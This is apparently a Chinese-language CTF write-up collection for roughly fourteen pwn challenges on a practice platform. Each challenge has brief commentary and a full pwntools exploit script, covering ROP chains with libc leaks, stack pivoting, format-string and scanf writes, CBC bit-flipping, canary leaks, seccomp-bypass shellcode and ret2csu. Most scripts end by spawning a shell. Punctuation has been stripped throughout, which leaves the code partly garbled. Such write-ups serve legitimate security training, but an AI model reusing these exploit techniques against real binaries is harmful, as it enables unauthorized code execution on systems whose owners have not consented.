当然题目名字给了提示直接能注意到结构体最后的0x40会覆盖下一结构体标志着编辑长度的size那就好办了直接写调用函数地址为system加控rdi就行了(别问为啥不写backdoor纯粹想试试行不行)
from pwn import *\# io process(./struct)io remote(nc1.ctfplus.cn, 11246)elf ELF(./struct)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))io.recv()io.sendline(b4)io.recvuntil(bgift\naddr:)printf_addr int(io.recv(14), 16)lg(printf_addr, printf_addr)libcbase printf_addr - libc.symbols[printf]lg(libcbase, libcbase)puts_addr libcbase libc.symbols[puts]lg(puts_addr, puts_addr)system_addr libcbase libc.symbols[system]def choose(choice):io.sendlineafter(b3. change player info:, str(choice).encode())def alloc(id, name, info, student2):choose(1)io.sendlineafter(bIndex:, str(id).encode())if 2 student:io.sendlineafter(b, str(2).encode())elif 1 student:io.sendlineafter(b, str(1).encode())io.sendlineafter(bname :, name)io.sendlineafter(binfo :, info)def edit(id, name):choose(3)io.sendlineafter(binput index:, str(id).encode())io.sendafter(bname :, name)def work(id):choose(2)io.sendlineafter(binput index:, str(id).encode())alloc(1, b/bin/sh\x00, b/bin/sh\x00)alloc(0, b0, b0)\# alloc(1, b1, b1, 1)\# alloc(0xf, b15, b15)edit(1, b/bin/sh\x00*2 p64(system_addr) b/bin/sh\x00*2)\# gdb.attach(io)work(1)io.interactive()\# dbg()stack_overflow
把栈地址甩脸上了直接行动要加个栈地址到现在还不知道向buf写的判断是用来干嘛的
from pwn import *\# io process(./pwn)io remote(nc1.ctfplus.cn, 36068)context.terminal [tmux, new-window]context.log_level debugelf ELF(./pwn)libc elf.libcio.recvuntil(bgive this gift:)\# gdb.attach(io)take u64(io.recv(6).ljust(8, b\x00))print(hex(take))\# gdb.attach(io)io.recv()io.send(p64(take 0x29))io.recv()io.send(b\x00*0x7)io.recv()payload p64(0) * 0x4 p64(0x4033C0 0x50) p64(0x000000000040123f) p64(elf.got[puts]) p64(0) p64(elf.plt[puts]) p64(0x401350)\# gdb.attach(io)io.send(payload)puts_addr u64(io.recv(6).ljust(8, b\x00))print(hex(puts_addr))libcbase puts_addr - libc.symbols[puts]print(hex(libcbase))system_addr libcbase libc.symbols[system]print(hex(system_addr))binsh_addr libcbase next(libc.search(b/bin/sh))print(hex(binsh_addr))one_gadget libcbase 0xebc88print(hex(one_gadget))\# gdb.attach(io)payload p64(0) * 0x4 p64(0x4033C0 0x50) p64(one_gadget)io.send(payload)io.interactive()WhoIsAdmin
提示直接把考点讲了觉得已经不能再简单了都可以当例题了
数组溢出买下系统然后用CBC翻转攻击的脚本转换明文就可以直接用改系统名的溢出打正常ROP(决定拿来当例题给新生讲嘻嘻)
from pwn import *from LibcSearcher import *\# io process([./ld-2.??.so,./], env {LD_PRELOAD : ./libc-2.??.so})\# io process(./whoisadmin)io remote(nc1.ctfplus.cn, 33679)elf ELF(./whoisadmin)\# libc ELF(./libc-2.??.so)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))from Crypto.Util.strxor import strxorimport binasciidef decrypt(string):\# 动态输入密文和目标明文块ciphertext_hex string # 示例密文ciphertext binascii.unhexlify(ciphertext_hex)\# 定义块大小通常为16字节BLOCK_SIZE 16\# 确保密文长度足够长至少包含两个块if len(ciphertext) 2 * BLOCK_SIZE:raise ValueError(密文太短至少需要包含两个块。)\# 分离前两块密文C_0 ciphertext[:BLOCK_SIZE] # 第一块C_1 ciphertext[BLOCK_SIZE:2*BLOCK_SIZE] # 第二块\# 定义已知的原始明文块和目标明文块original_plaintext bBinaryCryptoYYDS # 原始明文前16字节target_plaintext bAdminAdminAdminA # 目标明文前16字节\# 计算所需的异或调整量delta strxor(original_plaintext, target_plaintext)\# 修改C_0使得解密C_1时得到目标明文new_C_0 strxor(C_0, delta)\# 组合新的密文保持C_1不变modified_ciphertext new_C_0 C_1 ciphertext[2*BLOCK_SIZE:] # 仅修改第一个块\# 输出结果print(原始密文: , ciphertext_hex.decode())print(修改后的密文: , binascii.hexlify(modified_ciphertext).decode())return binascii.hexlify(modified_ciphertext).decode()def choose(choice):io.sendlineafter(bYour choice: , str(choice).encode())def new_normal_count():choose(1)io.recvuntil(bYour account authcode: )return decrypt(io.recvuntil(b\n, dropTrue))def show_money():choose(3)def buy_max_accountLimit(number):choose(4)io.sendlineafter(bTell me when check is equal to how much, (check**17 mod 281443 222876) is satisfied???, str(1640).encode())io.sendlineafter(bHow many accounts do you want to add?, str(number).encode())def show_max_accountLimit():choose(5)def buy_system():choose(6)def try_to_login(name):choose(7)io.sendlineafter(bPlease Input your account authcode:, name)def change_system_name(new_system_name):choose(8)io.sendlineafter(bPlease input the new system name: , new_system_name)buy_max_accountLimit(-100000)buy_system()attack new_normal_count()try_to_login(attack)\# gdb.attach(io)pop_rdi 0x0000000000402db3ret 0x000000000040101apayload bA*0x28 p64(pop_rdi) p64(elf.got[puts]) p64(elf.plt[puts]) p64(0x402C23)change_system_name(payload)puts_addr u64(io.recv(6).ljust(8, b\x00))libc LibcSearcher(puts, puts_addr)lg(puts_addr, puts_addr)libcbase puts_addr - libc.dump(puts)lg(libcbase, libcbase)system libcbase libc.dump(system)lg(system_addr, system)binsh libcbase libc.dump(str_bin_sh)lg(bin_sh_addr, binsh)payload bA*0x28 p64(ret) p64(pop_rdi) p64(binsh) p64(system)change_system_name(payload)io.interactive()\# dbg()
stdout
蛮有意思虽然我本来就知道设置缓冲区后write还是能够直接用fd正常工作不过还是觉得给了提示也可以当例题再偷一道哈哈
直接调试发现寄存器和返回地址残留修改后跳转到write前方就可以一次性泄漏出elf和libc的基址然后正常ROP当时one_gadget死活打不通找了师傅还没找到题作者直接换成system就出了还是太懒了哈哈
from pwn import *
# io process([./ld-2.??.so,./], env {LD_PRELOAD : ./libc-2.??.so})# io process(./pwn)# io remote(nc1.ctfplus.cn, 35132)elf ELF(./pwn)# libc ELF(./libc-2.??.so)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))# gdb.attach(io, b vuln)# shellcode # syscall# # shellcode asm(shellcode, archamd64)# payload shellcode.ljust(0x38, b\x00)# payload b\x0f\x05# payload payload.ljust(0x38, b\x00)# payload asm(shellcraft.amd64.linux.sh())# print(payload)# payload bA*0x28while True:# io process(./pwn)io remote(nc1.ctfplus.cn, 35132)try:payload bA*0x8# io.send(bA*(0x50-0x3d) p64(0xbfa7b))io.send(payload)# io.sendline()io.recvuntil(b???,out??)# io.sendline()# io.send(bAAA)# io.send(bA*0x40 b\x00)# io.send(bA*0x40 p64(0)*3 b\xfe\x8a\xeb)# io.send(bA*0x40 p64(0) b\xfb\x53)# io.send(bA*0x40 p64(0) b\x03\x54)# io.send(bA*0x40 p64(0) b\xfc\x53)# io.send(bA*0x40 p64(0) b\xd0\x80)io.send(bA*0x40 p64(0) b\x78\x53)io.recvuntil(bA*0x40)io.recv(0x8)elfbase u64(io.recv(6).ljust(8, b\x00)) - 0x1382lg(elfbase, elfbase)pop_rdi elfbase 0x0000000000001403lg(pop_rdi, pop_rdi)ret elfbase 0x000000000000101alg(ret, ret)bss elfbase 0x5040lg(bss, bss)take elfbase 0x1310lg(take, take)pop_all elfbase 0x00000000000013fclg(pop_all, pop_all)io.recv(0xa)libcbase u64(io.recv(6).ljust(8, b\x00)) - 0x24083lg(libcbase, libcbase)system libcbase libc.symbols[system]lg(system, system)binsh libcbase next(libc.search(b/bin/sh))lg(binsh, binsh)onegadget libcbase 0xe3afelg(onegadget, onegadget)io.recv()\# gdb.attach(io)# payload bA*0x48 p64(onegadget)# payload bA*0x48 p64(pop_rdi) p64(binsh) p64(system)# io.send(payload)payload bA*(0x40) p64(bss 0x40) p64(take)io.send(payload)payload bB*(0x40) p64(bss 0x400x40) p64(take)io.send(payload)payload p64(bss 0x400x40 0x10) p64(take)io.send(payload)# gdb.attach(io)payload p64(ret)*2 p64(pop_rdi) p64(binsh) p64(system)# payload bA*0x8 p64(pop_all) p64(0)*4 p64(onegadget)io.send(payload)io.interactive()except:io.close()continue简单的签到
没啥好说的甚至不用会pwn
from pwn import *\# io process(./main)io remote(nc1.ctfplus.cn, 35889)io.recv()io.recv()io.sendline()calc io.recvuntil(b, dropTrue)take eval(calc)io.sendline(str(take).encode())io.interactive()这里的空间有点小啊
read接栈迁的板子题了调下长度和bss就能打通
from pwn import *\# io process(./main)io remote(nc1.ctfplus.cn, 16336)context.terminal [tmux, new-window]context.log_level debugelf ELF(./main)libc elf.libcio.recvuntil(b[1] Write something\n[2] Give you a flag\n)io.sendline(b1)io.recvuntil(bNow you can write something)bss 0x601020 0x100payload bA*0x30 p64(bss) p64(0x40071C)io.send(payload)payload bB*0x30 p64(bss 0x30) p64(0x40071C)io.send(payload)payload p64(bss 0x30 0x10) p64(0x0000000000400853) p64(elf.got[puts]) p64(elf.plt[puts]) p64(0x40071C)io.send(payload)io.recv(1)libcbase u64(io.recv(6).ljust(8, b\x00)) - libc.sym[puts]print(hex(libcbase))system libcbase libc.sym[system]print(hex(system))og libcbase 0x4f302payload bA*0x20 p64(og) #p64(ret)p64(rdi)p64(bin_sh)p64(system) #5io.send(payload)io.interactive()真的能走到后门吗
具体通过泄漏能够拿到程序自己和保护给的两个canary然后回去重新用printf写一位返回地址到后门就行了
from pwn import *\# io process(./fmt)io remote(nc1.ctfplus.cn, 18593)context.terminal [tmux, new-window]context.log_level debugelf ELF(./fmt)libc elf.libcio.recv()io.send(p64(0x404018))io.recv()payload b% str(0x127D).encode() bc%16$hnpayload b%14$p%17$ppayload payload.ljust(0x10, b\x00)\# gdb.attach(io)\# io.send(bKKKKKKKK)io.send(payload)\# io.send(payload)\# io.recvline()io.recvuntil(byour name:\n)take int(io.recv(14), 16)print(hex(take))canary int(io.recv(18), 16)print(hex(canary))\# gdb.attach(io)io.recvuntil(bWhat do you want to say?\n)payload bA*0x38 p64(canary) p64(take) b\x9D # p64(0x40127D) # p64(0x5D)\# payload payload.ljust(0x70, bA)io.send(payload)\# gdb.attach(io, b vuln)io.recv()io.send(p64(take - 0x27))\# io.send(b\x66\x66\x66)payload b% str(0x12).encode() bc%16$hhn# b% str(0x7D - 0x12).encode() bc%16$hhnprint(hex(len(payload)))\# gdb.attach(io)io.send(payload)io.recvuntil(bWhat do you want to say?\n)payload bA*0x38 p64(canary) p64(take - 0x10) b\x85 # p64(0x40127D) # p64(0x5D)\# payload payload.ljust(0x70, bA)\# gdb.attach(io)io.send(payload)io.interactive()
ez_fmt
确实简单我当printf打了。。。
Scanf更简单只要知道偏移就能够任意写任意类型了
from pwn import *\# io process(./pwn)io remote(nc1.ctfplus.cn, 25743)elf ELF(./pwn)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debug\# io.recv()\# payload b0x18\# # gdb.attach(io, b *0x55555555532e)\# io.sendline(payload)\# main u64(io.recv(6).ljust(8, b\x00)) - 53\# log.info(fMain addr: {hex(main)})\# elfbase main - elf.symbols[main]\# log.info(fElf base: {hex(elfbase)})\# count_addr elfbase 0x4010\# log.info(fCount addr: {hex(count_addr)})io.recv()payload b0x9\# gdb.attach(io, b *0x55555555532e)io.sendline(payload)canary u64(io.recv(7).rjust(8, b\x00))log.info(fCanary: {hex(canary)})stack_addr u64(io.recv(6).ljust(8, b\x00))log.info(fStack addr: {hex(stack_addr)})io.recv()payload b0x38\# gdb.attach(io, b *0x55555555533e)io.sendline(payload)libc_start_main_addr u64(io.recv(6).ljust(8, b\x00)) - 243log.info(fLibc start main addr: {hex(libc_start_main_addr)})libcbase libc_start_main_addr - libc.symbols[__libc_start_main]log.info(fLibc base: {hex(libcbase)})system_addr libcbase libc.symbols[system]log.info(fSystem addr: {hex(system_addr)})binsh_addr libcbase next(libc.search(b/bin/sh))log.info(fBinsh addr: {hex(binsh_addr)})one_gadget_addr libcbase 0xe3b01log.info(fOne gadget addr: {hex(one_gadget_addr)})\# high_sys (one_gadget_addr 16) 0xff # 提取前两位one_gadget one_gadget_addr 0xffffffff # 提取后四位log.info(fone_gadget addr: {hex(one_gadget)})io.recv()payload p64(stack_addr - 0x18) p64(0) b%6$dpayload payload.ljust(0x20, b\x00)\# payload bA*8 bB*0x8print(hex(len(payload)))\# gdb.attach(io)io.send(payload)io.sendline(str(one_gadget).encode())io.interactive()hard_orw
对新生可能有点不友好但是也就是要转一下模式有32位的open然后用64位的sendfile就行了其它的没啥难点搓一下就出了
from pwn import *\# io process([./ld-2.??.so,./], env {LD_PRELOAD : ./libc-2.??.so})io process(./sandbox)\# io remote(nc1.ctfplus.cn, 37876)elf ELF(./sandbox)\# libc ELF(./libc-2.??.so)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))\# gdb.attach(io)io.recvuntil(bPlease input your id)io.send(b\x00\x00\x00\x00)io.recvuntil(bPlease input your age)io.send(b\xf0\x15\x40\x00)io.recv()\# push 0x67616c66\# push 0x2\# pop rax\# mov rdi,rsp\# xor rsi,rsi\# syscall \# mov rsp, 0x405100\# push 0x23\# add rsi, 9\# push rsi\# retfqshellcode mov rsp, 0x405100push 0x23add rsi, 0x10push rsiretfqshellcode1 push 0x67616c66add esi, 0xecmov ebx,espxor ecx,ecxxor edx,edxmov eax,5int 0x80push 0x33sub esi, 0x100add esi, 0x39push esiretfshellcode2 mov rdi, 1mov rsi, 3push 0mov rdx, rspmov r10, 0x100push SYS_sendfilepop raxsyscallshellcode asm(shellcode)shellcode1 asm(shellcode1, archi386, bits32)shellcode2 asm(shellcode2)shellcode shellcode1shellcode shellcode2shellcode shellcode.ljust(0x1000, b\x00)\# payload b\xe8\xfc\xf0\xff\x00\# payload b\xE9\xfb\xf0\xff\xff\# payload bH\x83\xed\x18\xc3\# payload b\xc3payload b\xffU\xf0\# gdb.attach(io)io.recvuntil(bPerhaps you should learn ret and fd first)io.send(payload)\# pause()\# gdb.attach(io)io.send(shellcode)io.interactive()你会栈溢出吗
直接到后门
from pwn import *# io process(./stackover)io remote(nc1.ctfplus.cn, 17766)io.recv()payload bA*(0xC 0x8) p64(0x40073D)io.sendline(payload)io.interactive()
orzorw
jmp rsp到最后才想起来打了半天leave_ret然后都报错。。。
此外就是神奇的复现的时候本地打不通了。。。
最大的问题其实是不能用\x00来泄漏canary又要用来当作read的长度参数但是太长read是不会成功执行的最开始本地调试到0x66可以才选的并且远端也成功了结果本地复现不成功不然也想当例题的等wp了
from pwn import *io process(./orw)\# io remote(nc1.ctfplus.cn, 39115)\# elf ELF(./orw)\# libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugio.recvuntil(bplease input your size:)shellcode push 0x67616c66push 0x2pop raxmov rdi,rspxor rsi,rsisyscall mov rdi, 1mov rsi, 3push 0mov rdx, rspmov r10, 0x100push SYS_sendfilepop raxsyscallshellcode asm(shellcode)print(len(shellcode))\# gdb.attach(io)io.sendline(str(4).encode())io.recvuntil(bPlease input your name:)\# payload b\x66*0xapayload b\x66*(0xa)\# gdb.attach(io, b *0x401382)io.send(payload)\# io.recvuntil(b\x66*0xa)io.recvuntil(payload)canary u64(io.recv(7).rjust(8, b\x00))log.info(fCanary: {hex(canary)})\# stack_addr u64(io.recv(6).ljust(8, b\x00))\# log.info(fStack addr: {hex(stack_addr)})io.recvuntil(bgive me your id)payload b\x00*0x4 p64(canary) p64(0x4040a00x30) p64(0x4012A7) shellcodegdb.attach(io, b *0x4013c1)io.send(payload)io.interactive()ez_shellcode
写完shellcode跳转过去
from pwn import *\# io process(./shellcode)io remote(nc1.ctfplus.cn, 27071)context.terminal [tmux, new-window]context.log_level debugcontext.arch amd64payload asm(shellcraft.sh())\# payload bKKKK\# gdb.attach(io)io.sendafter(bdo you know shellcode?, payload)\# gdb.attach(io)\# io.sendline(bA*0x20 p64(0x0000000000401463) p64(elf.got[puts]) p64(elf.plt[puts]) p64(0x4013E0))io.sendlineafter(bplease input your name:, bA*0x20 p64(0x401256))io.interactive()学校的烂电梯plus
看注释也能发现哈哈爆破出来的想过要住栈上打一个函数的返回但是没想到打谁爆破出了回去调发现是read后来的pro里把栈顶的去掉了就寄了。。。
from pwn import *io process(./pwn)\# io remote(nc1.ctfplus.cn, 34720)elf ELF(./pwn)libc elf.libccontext(arch amd64, oslinux, terminal[tmux, new-window])context.log_level debugdbg lambda: (gdb.attach(io),pause())lg lambda n,s: log.info(\033[1;1;20m%s: 0x%x --\033[0m\033[1;3;20m %s \033[0m % (str(n), eval(str(s)), s))print(elf.plt[puts])\# io.recv()\# gdb.attach(io)gdb.attach(io, b *0x40134d)\# gdb.attach(io, b *0x401389)\# gdb.attach(io, b *0x4013cb)\# io.sendline(str(-0x20).encode())\# io.sendline(str(-0xc).encode())\# io.sendline(str(-0).encode())\# io.sendline(str(-0x2).encode())\# io.sendline(str(-0x4).encode())\# io.sendline(str(-0x6).encode())\# io.sendline(str(-0x8).encode())\# io.sendline(str(-0xa).encode())\# io.sendline(str(-0xc).encode())\# io.sendline(str(-0xe).encode())\# io.sendline(str(-0x12).encode())\# io.sendline(str(-0x20).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(-0x22).encode())\# io.sendline(str(0x2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(-2).encode())io.sendlineafter(bhow many floors do you want to go?, str(-4).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.sendlineafter(bhow many floors do you want to go?, str(2).encode())\# io.recv()\# io.recv()import struct\# target_value 0x4013BAtarget_value 0double_value struct.unpack(d, struct.pack(Q, target_value))[0]io.sendlineafter(bwhich one you want to call?, str(double_value).encode())pop_rdi 0x000000000040127fpayload p64(0) p64(pop_rdi) p64(elf.got[puts]) p64(elf.plt[puts]) p64(elf.symbols[main])io.sendlineafter(byou have be saved, please send a message to thanks for the man!!, payload)io.recv()puts_addr u64(io.recv(6).ljust(8, b\x00))lg(puts_addr, puts_addr)libcbase puts_addr - libc.symbols[puts]lg(libcbase, libcbase)system_addr libcbase libc.symbols[system]lg(system_addr, system_addr)str_bin_sh libcbase next(libc.search(b/bin/sh))lg(str_bin_sh, str_bin_sh)io.sendlineafter(bhow many floors do you want to go?, str(-4).encode())\# target_value 0x4013BAtarget_value 0double_value struct.unpack(d, struct.pack(Q, target_value))[0]io.sendlineafter(bwhich one you want to call?, str(double_value).encode())ret 0x000000000040101apayload p64(0) p64(ret) p64(pop_rdi) p64(str_bin_sh) p64(system_addr) # p64(elf.symbols[main])io.sendlineafter(byou have be saved, please send a message to thanks for the man!!, payload)\# io.sendlineafter(bhow many floors do you want to go?, str(-0x2).encode())\# io.recv()\# io.sendline(str(-0xc).encode())\# io.recv()\# io.sendline(str(2.0747565e-317).encode())\# io.recv()\# io.sendline(bA*0x8)\# # io.sendline(str(2.0747585e-317).encode())io.interactive()su~~~~
没懂题目名叫su干嘛直接ROP就出了
from pwn import *\# io process(./csu)io remote(nc1.ctfplus.cn, 29975)context(archamd64, oslinux)context.log_level debugcontext.terminal [tmux, new-window]elf ELF(./csu)libc elf.libcio.recv()io.sendline(b1)payload bA*0x88 p64(0x0000000000400903) p64(elf.got[puts]) p64(elf.plt[puts]) p64(elf.sym[main])io.sendline(payload)puts_addr u64(io.recv(6).ljust(8, b\x00))print(hex(puts_addr))libcbase puts_addr - libc.symbols[puts]print(hex(libcbase))system libcbase libc.symbols[system]print(hex(system))str_bin_sh libcbase next(libc.search(b/bin/sh))print(hex(str_bin_sh))io.recv()io.sendline(b1)payload bA*0x88 p64(0x00000000004005d6) p64(0x0000000000400903) p64(str_bin_sh) p64(system)io.sendline(payload)io.interactive()
